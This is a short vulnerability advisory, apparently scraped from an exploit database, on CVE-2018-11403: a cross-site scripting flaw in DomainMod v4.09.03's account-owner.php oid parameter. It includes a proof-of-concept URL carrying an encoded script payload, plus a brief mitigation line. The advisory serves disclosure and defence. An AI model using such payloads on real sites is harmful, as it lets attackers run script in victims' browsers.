DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter

vendor:

DomainMod

by:

longer

5.4

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: DomainMod

Affected Version From: v4.09.03

Affected Version To: v4.09.03

Patch Exists: YES

Related CWE: CVE-2018-11403

CPE: a:domainmod:domainmod

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter

An issue was discovered in DomainMod v4.09.03. After the user logged in, open the url http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E, the XSS payload will be executed.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter

Mitigation:

Exploit-DB raw data: